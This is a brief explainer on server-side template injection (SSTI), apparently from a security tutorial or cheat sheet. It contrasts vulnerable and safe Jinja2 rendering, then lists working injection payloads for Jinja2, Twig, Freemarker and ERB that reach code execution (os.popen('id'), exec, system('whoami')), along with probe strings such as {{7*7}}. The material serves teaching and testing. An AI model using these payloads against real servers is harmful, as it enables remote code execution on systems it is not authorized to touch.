Server-Side Template Injection (SSTI) is a vulnerability where user input is embedded into a server-side template in an unsafe manner, allowing attackers to inject template directives that execute arbitrary code on the server.
Template engines process templates containing placeholders and directives. When user input is concatenated directly into templates rather than passed as data, attackers can inject template syntax to access objects, call methods, and ultimately execute code.
# Python/Jinja2 - vulnerable
template = "Hello " + user_input
return render_template_string(template)
# Safe approach
return render_template_string("Hello {{name}}", name=user_input)# Jinja2 (Python)
{{config}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}
# Freemarker (Java)
${"freemarker.template.utility.Execute"?new()("id")}
# ERB (Ruby)
<%= system("whoami") %>{{7*7}} returns 49${'test'.toUpperCase()}